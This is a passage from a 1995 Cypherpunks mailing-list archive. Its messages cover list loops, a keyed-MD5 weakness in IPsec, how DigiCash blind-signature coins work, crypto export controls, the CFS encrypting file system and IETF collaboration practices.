On Wed, 25 Oct 1995, John Gilmore wrote:

> It's true, for a period of about 45 minutes today, someone subscribed
> the Cypherpunks list to itself.  This resulted in a small number of
> looped messages.
> 
> Also in today's bogus news, a rather testy newbie, Arthur Germain,
> subscribed at 8AM Tuesday.  He had unsubscribed by 3PM Tuesday, but
> when he got another twenty or thirty messages (that had been sent to
> cypherpunks while he was a subscriber, but which hadn't reached him
> yet), he forwarded each of them back to the mailing list.  You may or
> may not have seen some of these; I killed off further distribution.

Perhaps we can prevent this sort of thing by putting a signature in each 
message as majordomo sends it, say some X-Majordomo-Sent-Already header 
line?  Then when majordomo reads an incoming message it would look for 
that text in both the header and the body, and upon finding it, would 
discard the message.

This would work because removing such a line in order to get majordomo to 
choke would mean either writing code, or doing it manually.  If 
cypherpunks is subscribed to itself, it's easy for majordomo to not 
accept cypherpunks@toad.com as a subscriber.  But if someone forwards a 
message or many back to the list, they'd vanish.

One of the nicer things about FidoNet (perhaps the only one) is that once 
a system receives a message, it adds a signature in the hidden area 
called "seen by" with it's node number.  If Majordomo did that, it would 
know it sent that message already...

Not much of a fix, but a nice-to-do kind of fix. :-)


==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Thu, 2 Nov 1995 08:15:16 +0800
To: perry@piermont.com
Subject: Re: Keyed-MD5, and HTTP-NG
Message-ID: <9510018152.AA815258328@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry,
        I personally spoke to Bill Simpson about this problem.  I should have
given you a phone call or email in addition to speaking to Bill.  In my
opinion this problem does not at all reflect on your skills or reputation.
What it signifies to me is the poor state of cryptographic engineering.
If anything, it points out the wisdom of the IPsec designers in requiring
that key material have a limited lifetime.  A wise engineering choice like
this protects the system against many different kinds of attacks.  Of course,
the protocol implementors often omit "details" like key lifetime limits.
In fact, 17 years ago when I wrote a TCP/IP stack for the Xerox Alto I left
out several "details", which of course caused lots of problems when I
did interoperability testing with a mainframe (Multics).
                --Bob


______________________________ Reply Separator _________________________________

On 11/1/95 10:20 AM, perry@piermont.com worte:

> There were two names on the MD5 document -- mine and Bill
> Simpson's. Bill didn't tell me that he was called (I suspect he 
> would have), and I wasn't called, either. We were the only two 
> editors of that portion of the specification.
> 
> Given that my name was on that document and that I made a large effort to 
> try to make sure that people examined the algorithms and thought they were 
> good, and that I have some of my reputation tied to that document, I am 
> rather unhappy at the fact that I only find out third hand about what people 
> in the field have determined about our selected algorithm.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zuhn@sctc.com (david d `zoo' zuhn)
Date: Thu, 2 Nov 1995 11:18:36 +0800
To: cypherpunks@toad.com
Subject: D.C. (and other?) C'punx at C.S.I. show?
Message-ID: <v02130500acbd640d015c@[172.17.1.134]>
MIME-Version: 1.0
Content-Type: text/plain


I'm going to be in D.C. for the CSI show next week (Nov 5-8), and would be
interested in getting together (dinner, beer, whatever) with other folks
interested in cypherpunkish things.  If a number of you respond, I'll try
to coordinate some sort of group event if at all possible.

Send me mail, give me a call, or stop by booth 111.


--
david d `zoo' zuhn  --  secure computing corporation  --  zuhn@sctc.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Thu, 2 Nov 1995 10:16:45 +0800
To: Mixmaster Mailing List <cypherpunks@toad.com
Subject: Birds of a Feather...
Message-ID: <Pine.BSD.3.91.951101130010.807B-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone!

	Some of us are going to USENIX in January. If you want to discuss 
like interests for this event, I've opened #remailop on IRC on DALnet. 
Need a server? irc.phoenix.net.. See ya there!!

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

iQCVAwUBMJfE0VOTpEThrthvAQEbRAP9FIB0IoyPjm2QNNj4JQADqfbOysotX0hH
JPINLylbhbSVtM9wxiS4PZPtqSdJZINujXIi4S3nXeUkIlYHMhQQRUxNT79RMiUu
Zp8uaiMmryAlJGeJ+wBpWNCuB7rtuYq5/p7dPBWmtLtKkiEedS4SDXxvZAc/P7my
2Me0/8xjq5E=
=ca8i
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 2 Nov 1995 12:17:49 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: ecash remailer
In-Reply-To: <199510311940.OAA31415@opine.cs.umass.edu>
Message-ID: <Pine.SUN.3.91.951101130302.2576B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Now I am fully confused.

I thought a property of Chaumian DigiCash was that a coin *had* to go back
to the bank before it could be spent again.  Yet all "coin exchange"
schemes discussed here recently involve Alice paying Bob who then sends
the coin to Carol's Exchange who then sends it to the bank while sending
some other value, maybe a Carol coin, to Bob. 

Logically, I can see at least four possibilities:

1) payee data is encoded onto the coin at time of payment, making it 
impossible for Carol to bank the coin.  I see no evidence of this in the 
docs at the Digicash site, but I just rechecked quickly and may have 
missed it.

2) No payee data as such is encoded on the coin but it is marked "spent" 
to prevent multiple uses by payee to the detriment of payor.  ditto on 
the evidence.

3) the Digicash software only allows you to send a "spent" coin to the 
bank.  You have to hack the software to send the coin to Carol (do you 
have to break your own key?).

4) nothing in the DigiCash software or protocol prevents you from sending 
a coin to Carol so long as you trust Carol not to get you in trouble by 
misusing the coin in some way.  That's why Chaum is interested in 
hardware based agents that would keep you from respending coins you receive.

No doubt there are others.  Anyone know what the reality is?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 2 Nov 1995 12:10:21 +0800
To: "baldwin" (Robert W. Baldwin) <baldwin@rsa.com>
Subject: Re: Keyed-MD5, and HTTP-NG
In-Reply-To: <9510018152.AA815244951@snail.rsa.com>
Message-ID: <199511011820.NAA02107@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"baldwin" writes:
>         I also understand your being upset about not hearing about this
> attack the moment it was published.  Actually, as soon as RSA Labs confirmed
> the weakness we did call some of the editors of the IPsec specifications
> to let them know about it.  The consensus was that this was not a show
> stopper.

There were two names on the MD5 document -- mine and Bill
Simpson's. Bill didn't tell me that he was called (I suspect he would
have), and I wasn't called, either. We were the only two editors of
that portion of the specification.

Given that my name was on that document and that I made a large effort
to try to make sure that people examined the algorithms and thought
they were good, and that I have some of my reputation tied to that
document, I am rather unhappy at the fact that I only find out third
hand about what people in the field have determined about our selected
algorithm.

> The IPsec protocols could be rolled out as is.  Later, once a
> better authenticator had been developed and tested, it could be
> substituted for the existing one.  One of the excellent features of the
> IPsec specification is that new algorithms can be substituted easily
> (modulo a "small matter of programming").

I know. I was one of the designers. We all understood extremely well
that crypto algorithms become rapidly obsolete. However, we needed to
specify a reasonably strong baseline transform that would be widely
deployed. I was shocked at the level of trouble we had in getting the
cryptoweenies to successfully agree on a keyed hash based transform no
matter how long was spent on the topic. I've got to say that my
opinion of the academic crypto community dropped substantially after
the experience. I would have thought that people could at least have
agreed on what they knew and didn't know.  This was strikingly
different from my experience with other mathematical fields, in which
the experts seem to agree pretty readily about what is and isn't
known.

>         Perhaps your main complaint is that it took time for the attack
> to be confirmed by other researchers before the issue was brought to
> the IPsec authors.  That is another effect of the current state of the
> art in Cryptography, and an effect of the normal academic process.

People might have noted their suspicions to us. As engineers, we are
capable of avoiding something based on on suspected weakness without
solid confirmation -- we aren't trying to publish papers, we are
trying to get things to work.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 17:54:46 +0800
To: cypherpunks@toad.com
Subject: Re: IBM's Microkernal
In-Reply-To: <199511011817.TAA17785@utopia.hacktic.nl>
Message-ID: <199511011832.NAA02128@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> 
> Responding to msg by perry@piermont.com ("Perry E. Metzger") on 
> Wed, 01 Nov 11:51 AM
> 
> >Why is this being sent to cypherpunks? Its totally 
> >irrelevant.
> 
> 
> It's related to IBM's work on machine/code interface security, 
> encryption and authentication capabilities.

No it isn't. Its just an operating system microkernel. These typically
just provide very low level process abstractions to allow device
drivers and operating system interfaces to be built as processes. It
has nothing WHATSOEVER to do with cryptography.

I realize that the word "code" appeared in the article, but just
because the word "code" gets used doesn't mean we are talking about
cryptography.

By the way, learn how to spell "kernel".

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 2 Nov 1995 09:44:50 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [FRED] Anonymity and Integrity
In-Reply-To: <9511011022.AA08641@all.net>
Message-ID: <199511011907.OAA16631@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


My turn to rise to the bait...

Dr. Frederick B. Cohen writes:
> I have been thinking about the issues of anonymity for some time, and I
> have been convinced for some time that you can't have both integrity and
> anonymity.  

What's your working definition of "integrity" in this context ?

-Futplex <futplex@pseudonym.com>
"Once anonymous, twice pseudonymous"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 2 Nov 1995 08:42:04 +0800
To: cypherpunks@toad.com
Subject: Re: The cost of ITAR
Message-ID: <199511012336.PAA16268@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> Here's the problem:  Because the US government has outlawed the export of
> industrial-strength encryption, firms seeking to do business abroad find 
> themselves without trustworthy security options once they leave US 
> boundaries.  How can companies in the information and networking 
> business, such as Sun Microsystems, possibly sell a system to Alcatel in 
> France, for example, if the encryption that accompanies it can be broken 
> by a 14-year-old with too much time on his or her hands?  They can't.  So 
> Sun came up with a novel solution: buy Russian.  The Soviets may have 
> sucked at cars and strip malls, but they sure as hell knew their 
> cryptography.  "The Russians can make any kind of encryption you want" 
> says Geoffrey Baehr chief network officer at Sun.  And what can the US 
> government do about a product developed outside its borders?  Nothing.

Actually the US government and US industry generally does not follow any
coherent industrial development policy of which ITAR is but one single
part. There is almost a jingoistic belief in the "free market"  with a
concomitant commitment to a strong American individualism.  While this
may function domestically, it certainly does not function internationally. 

The US continues to cede entire industries through poor economic and trade
policy.  I guess, nothing was learned with Boeing and Airbus. 

ITAR regulations will simply lock-out US companies from foreign markets,
and this combined with "competition" rather than "co-operation" will allow
foreign firms to divide and conquer American firms.  Foreigners generally
don't trust "American" as it is. 

Historically, the US has deliberately sold inferior security products
while making representations that they were in fact secure.  While this
*might* work on unsuspecting civilians, internationally it just doesn't
pass the giggle test, and won't allow a US firm to even make the bid list 
outside their own borders in the not too distant future.

US companies will loose the entire international market, unless they begin
to think globally.  Non-legislated trade lockouts based on Nationalism are
extremely difficult to overcome. 

> In fact, Sun was so taken with Russia's computing talent that the company 
> recently hired the entire team once responsible for the next generation 
> of Soviet supercomputers (and the Russians brought along the plans for 
> the beasts).  Ask Sun chief scientist John Gage if he'd rely on 
> US-approved encryption to send those plans between Moscow and California, 
> and he'll laugh out loud.  "We can't rely on that stuff.  We're talkling 
> trade secrets here!" - John Battelle

While John Gage, may laugh out loud, it is actually a very serious matter.
Trade secrets are not for laughter.  

As an example, what value is access to Pacific Gas's LAN??  Let's suppose
that Pacific Gas could be compromised because of poor security or
encryption -- a compromise which occurs as a result of some user
installing a commercial web-browser which had a well-known "back door", a
browser like the Netscape product. 

What would be the fallout from this??

Maybe (domestically), Pacific Gas customers might not be _happy_ that
PGT's market book was given over to CAPP, and that foreign producers knew
*exactly* what Californian's Natural Gas open interest was in advance on a
real time basis.  And that CAPP, hypothetically, has used and continues to
use that information in trading on Natural Gas markets, which results in
all Californians paying a 30% premium on their utility bills. 

Would this be a laughing matter??  

Who would laugh if natural gas prices were up (as they in fact are) 
25 - 30% at the trading hub AECO-C? 

And while PGT might ignore daisy chaining, and advance the argument that
the hole was at NGX -- rather than at PGT, or maybe that the hole was
because a client of NGX installed a copy of Navigator 1.1 somewhere, how
far would the laughter carry??  Especially the laughter at the keystone
cop finger pointing?? 

Around the world, maybe?

The idea of a foreign group of producers positioning themselves through
high-tech scouting by taking advantage of the shoddy design of a "Made in
America" product so that they could indirectly tax the citizens of
California is _truly_ a laughing matter.  Trivial in fact.

The uproar of a class action suit by all the customers of PGT would be but
a small nuisance within the context of the international fallout.  

Laughter will not be on the lips of US executives when it becomes known
that the security flaw in Navigator 1.1 was "well and widely known" within
the US software, hardware and security industry, and that ALL members 
of kept quiet about and around it. 

There will be little laughter at the catastrophic trade fallout if it is
demonstrable (as it was) that a US multi-billion dollar company knowingly
distributed a program which functions as a virus delivery vehicle, and
that all US industry members decided that their "industrial policy" 
dictated that they would not step forward and speak out. 

There will be very little laughter amongst shareholders and directors 
when they become aware that not only were entire markets sacrificed to 
"keep the secret" but that the entire US economy was put at risk.
 
Good-bye international markets -- not just for the said billion dollar 
company -- but for all members of the industry who domicile in the US.  

> This looks like a striking example of regulatory arbitrage at work, and 
> if it can be confirmed in its details ought to be an extremely powerful 
> anecdote in the hands of those working against GAK and ITAR.
>
> The sucking sound is American jobs heading overseas, 
> the snorting sound is American trade-secrets being sniffed up 
>     by foriegn competitiors, 

Yep, and it's not even a question of someone else causing this.  This is 
US citizens, and US companies having a limited experience and view in 
international trade, and that very inexperience leading to their OWN 
creation of these problems.  Has anyone considered GISA in all of this?
Probably not.

As an example, I contacted AT&T, regarding the Netscape flaw which was
posted to the Internet on Friday the Thirteenth -- the flaw that Netscape
had "no comment" on.  I asked for AT&T commentary, since they were selling
the Netscape product under their own brand.  I also asked for referral to
their Security Officer, rather than their Public Relations people. 

AT&T's response??

    "...I am not sure that our security officers are up to it.  Often 
    AT&T just repackages an external product, without opening it or 
    understanding it.  My guess is that the corporation is likely to 
    simply trust the netscape folks unless an actual hole can be  
    demonstrated."

And with that, there's 'nuff said ...

> Maybe the FBI's responsibility for US counter-intelligence is meant as a 
> double-entendre?

I guess getting shot by friendly fire does sound better than saying that
you're shooting yourself in the foot.  Don't it?? 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 1 Nov 1995 23:30:55 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511011445.PAA13294@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Oct 1995, Anonymous wrote:

> Wall Street Journal, October 30, 1995, p. B3.

> Brad Meinert, senior analyst at research firm Input, says the
> tremendous growth of the World Wide Web, a graphics Internet
> interface, "is putting increased capacity demands for greater
> bandwidth on the Internet infrastructure."

I see our media friends are just as clueful as ever .... graphics 
Internet interface ??  Thats almost as bad as saying "Come visit our 
Internet Site" when they mean Web site !!













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Sun, 5 Nov 1995 22:35:17 +0800
To: cypherpunks@toad.com
Subject: Re: New release of CFS Unix encrypting file system available
In-Reply-To: <9510271856.AA24314@merckx.info.att.com>
Message-ID: <m0tAfXb-0002duC@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Matt" == Matt Blaze <mab@research.att.com> writes:

    Matt> Source code for the latest version (release 1.3.1) of CFS,
    Matt> the Cryptographic File System, is now available upon request
    Matt> for research and experimental use in the US and Canada.

Please report any leakage of this software immediately to this list.

Andreas

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMJeY2EyjTSyISdw9AQFD7AP/SghCAohL5yJP6kgwz2W45zuexFkh1gQO
s32CaBQqTEGLir7S5llYd53Eiof/y6JDCEDao9B45Tcz8IKtW2YhPbAOrRLS1dnp
G8GTRL31R/LtqUaKcn/VqgV+sa6dwMWtelPnrYoFhtS5mxmBXP00nCca+PWfw8kt
EadgTZtIYyc=
=PgXu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 2 Nov 1995 07:31:40 +0800
To: cypherpunks@toad.com
Subject: Re: US government department for crime enforcement!
In-Reply-To: <199511011440.GAA23008@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9511011736.B46528-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 1 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> It's come to my attention that the US government has a group
> called the 'Department of the Treasury Financial Crimes 
> Enforcement Network' in Vienna, Virginia.
> 
Yeah, in case you're interested, Anon, Wired had an article on them,
I think in 1.2, the cypherpunks issue. It might also be in their privacy 
archive. Fincen has webpages at 
www.ustreas.gov/treasury/bureaus/fincen/fincen.html

The agency is pretty much an alternative to the IRS's crumbling computers
and a nice cover for possibly unapproved interagency cooperation.
Look up some recent posts by Douglas Barnes on a banking conference.

Sorry to repeat what's been said here a zillion times before.

This account is a remailer for bad terminal servers. The above opinions are 
entirely the result of line noise. @#$#@$~%?!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Thu, 2 Nov 1995 02:22:38 +0800
To: Andreas Bogk <andreas@artcom.de>
Subject: Re: New release of CFS...
In-Reply-To: <m0tAfXb-0002duC@horten>
Message-ID: <Pine.HPP.3.91.951101180307.29374A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Andreas Bogk wrote:

> Please report any leakage of this software immediately to this list.

Try ftp://utopia.hacktic.nl/pub/replay/crypto/CRYPTOapps/cfs.1.3.tar.gz

Mats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 2 Nov 1995 22:15:24 +0800
To: cypherpunks@toad.com
Subject: Re: US government department for crime enforcement!
Message-ID: <199511012333.SAA15819@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Still, anonymous does make an astutely ironic observation, in 
humorous lifting of the customary FinCEN cloak:


That the hydra-headed agency may be literally aim at financial 
*crimes* enforcement rather than enforcement of the laws 
against such deeds.


Especially given the participating renegade agencies who seem 
to absolve themselves of these laws.


Perhaps anonymous is right, they are a band of outlaws, daring 
to overtly flaunt it, expecting no opposition from the gullible 
cowed.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 2 Nov 1995 11:36:46 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: ecash remailer
Message-ID: <199511020239.SAA27491@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:20 PM 11/1/95 -0500, Michael Froomkin <froomkin@law.miami.edu> wrote:
>I thought a property of Chaumian DigiCash was that a coin *had* to go back
>to the bank before it could be spent again.  

No.  The basic Chaum Digicash method looks like this:
1) Alice creates a number of a recognizable form (Chaum's 1985 CACM paper
uses n1n2n3...n64n1n2n3....n64, i.e. a 64-bit number concatenated with itself).
2) Alice blinds the number and sends it to the bank (along with some request
for withdrawing money from her account or payment in other coin or whatever.)
3) The bank signs the number and sends it back.
4) Alice unblinds the coin; now it's good, recognizably signed, and untraceable.

5a) Alice gives the coin to Bob, who deposits it; the bank records the coin
number,
and in case of double-spending, the first person to the bank wins.
This is useful for on-line transactions, or off-line where everyone trusts
each other.

OR 5b) Alice gives the coin to Bob using a complicated cut&choose protocol that
doesn't give away her identity if it's only used once, but if she also gives the
same coin to Carol with the same protocol, Bob and Carol can identify Alice
with probability 1 - 1/2**n, for some adequately large n.  This is more work,
but you can use it for off-line transactions where you don't trust Alice
not to double-spend.  The protocol doesn't say what to do to Alice if you
catch her
cheating; depending on the environment you can debit her account or sue her etc.

6) Bob now has a number, signed by the Bank of Foo, which he can either give
to them
to deposit or get cash or use for highway toll (if Foo is really the highway
company)
or give to somebody else to spend (which is a little messy in the cut&choose
method.)

>Logically, I can see at least four possibilities:
>1) payee data is encoded onto the coin at time of payment, making it 
>impossible for Carol to bank the coin.  I see no evidence of this in the 
>docs at the Digicash site, but I just rechecked quickly and may have 
>missed it.

The basic protocol doesn't say anything about what a valid coin looks like;
you could use the example in Chaum's paper or a long string followed by
a checksum or whatever.  You _could_ put the payee's name account number
in the string as the 64-bit "random" number, or even put both payer and payee.
The bank could insist on that sort of thing if they wanted.
If I remember right, the version in the Digicash trial left you the choice
of filling in a specific payee or using "@" for bearer-payable coins.

>2) No payee data as such is encoded on the coin but it is marked "spent" 
>to prevent multiple uses by payee to the detriment of payor.  

The bank marks the coin spent upon deposit.

>3) the Digicash software only allows you to send a "spent" coin to the 
>bank.  You have to hack the software to send the coin to Carol (do you 
>have to break your own key?).

I don't know if their merchant-client software lets you do this or not,
but it's just a matter of implementation, not protocol.

>4) nothing in the DigiCash software or protocol prevents you from sending 
>a coin to Carol so long as you trust Carol not to get you in trouble by 
>misusing the coin in some way.  That's why Chaum is interested in 
>hardware based agents that would keep you from respending coins you receive.

Your problem isn't trusting Carol not to get you in trouble,
it's trusting Alice not to spend the coin again.
Hardware-based agents are interesting because they make it easier to
enforce double-spending prevention in off-line systems, and to offer
better anonymity because you've got more trust that the person didn't 
double-spend.  Stefan Brands has done a lot of work on this.

In on-line systems you can check whether a coin's been spent already
by depositing it - the problem is that on-line systems aren't
always convenient for many applications (e.g. newspaper machines),
and the costs of communication for an on-line system may be higher
than the cost of a sufficiently smart smart-card.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 3 Nov 1995 17:51:00 +0800
To: cypherpunks@toad.com
Subject: Transcript of Bernstein hearing is now available
Message-ID: <9511020308.AA25206@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


We received the transcript of October 20's oral hearing from the court
stenographer.  It's up on the EFF Web site at:

http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/951020_hearing.transcript

This is from Dan Bernstein's case, which is trying to get the crypto
export laws invalidated as unconstitutional.  This particular hearing
is about the government's motion to throw the case out of court
because the courts don't have jurisdiction to decide the issue.  Some
of it is deep legalese, and some of it is quite readable.

There's still no news from the judge on what her decision is, or when
she will decide.

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 2 Nov 1995 12:22:34 +0800
To: cypherpunks@toad.com
Subject: Re: IBM's Microkernal
Message-ID: <199511011817.TAA17785@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by perry@piermont.com ("Perry E. Metzger") on 
Wed, 01 Nov 11:51 AM

>Why is this being sent to cypherpunks? Its totally 
>irrelevant.


It's related to IBM's work on machine/code interface security, 
encryption and authentication capabilities. Cryptographers may 
want to examine how these work in Microkernal. If IBM will 
allow access to the features.


And it's related to parallel alarms sounded on cypherpunks 
about the impossibility of any durable security which does not 
anticipate ever-changing attacks devised by authors of 
competing products and services.


Finally, not your hat size, to be sure, it's related to the 
vanity of computer security consultants who dismiss unknown 
competition at the peril of their credibility.


"The free market is a terror for tortured souls." Anonymous.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sun, 5 Nov 1995 17:00:10 +0800
To: "baldwin" <baldwin@rsa.com (Robert W. Baldwin)>
Subject: Re: Keyed-MD5, and HTTP-NG
In-Reply-To: <9510018152.AA815258328@snail.rsa.com>
Message-ID: <9511020101.AA05060@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


On 11/1/95 10:20 AM, perry@piermont.com worte:

> There were two names on the MD5 document -- mine and Bill
> Simpson's. Bill didn't tell me that he was called (I suspect he 
> would have), and I wasn't called, either. We were the only two 
> editors of that portion of the specification.

This appears to have been a problem from both ends. A number of
people arround here only heard about the IPsec work when it had
reached the final call phase.

There also seems to be a move towards looking at the question of
how protocol and cryptography interacts as a field in it own right.

I think this highlights one of the problems with the IETF we need a 
much broader infrastructure for understanding what progress other 
groups have made. The time when we can expect to do everything through 
email alone is past. I wish I could persuade more people in the IETF
that the Web infrastructure could provide a valuable assistance
as a collaboration tool for their needs. Unfortunately the approach seems
to be that because there are is a person living at the end of a 2400
baud modem in vermont who cannot configure his PPP we should all continue
in the stone age. 

We could improve readability of RFCs through using HTML and reduce
the flamage on mailing lists through collaboration tools like the
open meeting. But we don't because it hasn't been done that way in the
past.

I would like to see a collaboration system where I can present an expert
with the context of a proposal very rapidly without expecting them to
read the archives of an entire mailing list.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Thu, 2 Nov 1995 08:31:10 +0800
To: cypherpunks@toad.com
Subject: Re: IBM's Microkernal
In-Reply-To: <199511010122.CAA29490@utopia.hacktic.nl>
Message-ID: <478k8o$gp@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511010122.CAA29490@utopia.hacktic.nl>,
Anonymous <nobody@REPLAY.COM> wrote:
> International Business Machines Corp., in its effort to reduce
> the importance of computer-operating systems, announced a new
> kind of universal-software code called Microkernal that
> enables software to work on incompatible hardware.

Impressive!  I wonder if it works without using algorithms.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Fri, 3 Nov 1995 03:41:37 +0800
To: cypherpunks@toad.com
Subject: Re: New release of CFS...
In-Reply-To: <m0tAfXb-0002duC@horten>
Message-ID: <199511011915.UAA18695@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Mats Bergstrom (asgaard@sos.sll.se) wrote:
> Andreas Bogk wrote:
>
> > Please report any leakage of this software immediately to this list.
>
> Try ftp://utopia.hacktic.nl/pub/replay/crypto/CRYPTOapps/cfs.1.3.tar.gz

That's 1.3, not 1.3.1.  What are the changes in the new version?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 2 Nov 1995 10:18:31 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, and HTTP-NG
In-Reply-To: <9511020101.AA05060@zorch.w3.org>
Message-ID: <199511020123.UAA02652@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> This appears to have been a problem from both ends. A number of
> people arround here only heard about the IPsec work when it had
> reached the final call phase.

I can't help that. We were very loud about our efforts and I
publicized them wherever I could. I mentioned drafts here on
cypherpunks and elsewhere frequently. We tried to solicit the help of
lots of people in the crypto community. I was begging people for help
with our MD5 and other transforms for months and months. I believe
that lots of people were aware of what was going on and just didn't
take us seriously until the last minute.

> I think this highlights one of the problems with the IETF we need a 
> much broader infrastructure for understanding what progress other 
> groups have made. The time when we can expect to do everything through 
> email alone is past.

I pretty much know whats going on throughout the IETF, although I
don't know all the petty details. I think that its a matter of trying
to remain plugged in and following the announcements of drafts.

> I wish I could persuade more people in the IETF that the Web
> infrastructure could provide a valuable assistance as a
> collaboration tool for their needs. Unfortunately the approach seems
> to be that because there are is a person living at the end of a 2400
> baud modem in vermont who cannot configure his PPP we should all
> continue in the stone age.

There are lots of IETF web pages already.

> We could improve readability of RFCs through using HTML

I truly dislike that idea. I hope that this never comes to pass. Text is
just fine. RFCs are perfectly readable right now. The problem is more
getting people to read them than legibility problems. If anything
would be an improvement it would be postscript, and I oppose that even
though its easy for anyone who wants to to get a postscript interpreter.

> I would like to see a collaboration system where I can present an expert
> with the context of a proposal very rapidly without expecting them to
> read the archives of an entire mailing list.

I would like to see such a thing as well. I would also like to see a
system which permitted perfectly just adjudicaiton of disputes without
need for evidence. Unfortunately, neither is possible.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 2 Nov 1995 10:38:22 +0800
To: cypherpunks@toad.com
Subject: Re: [FRED] Anonymity and Integrity
In-Reply-To: <199511011907.OAA16631@opine.cs.umass.edu>
Message-ID: <9511020130.AA17317@all.net>
MIME-Version: 1.0
Content-Type: text


> My turn to rise to the bait...
> 
> Dr. Frederick B. Cohen writes:
> > I have been thinking about the issues of anonymity for some time, and I
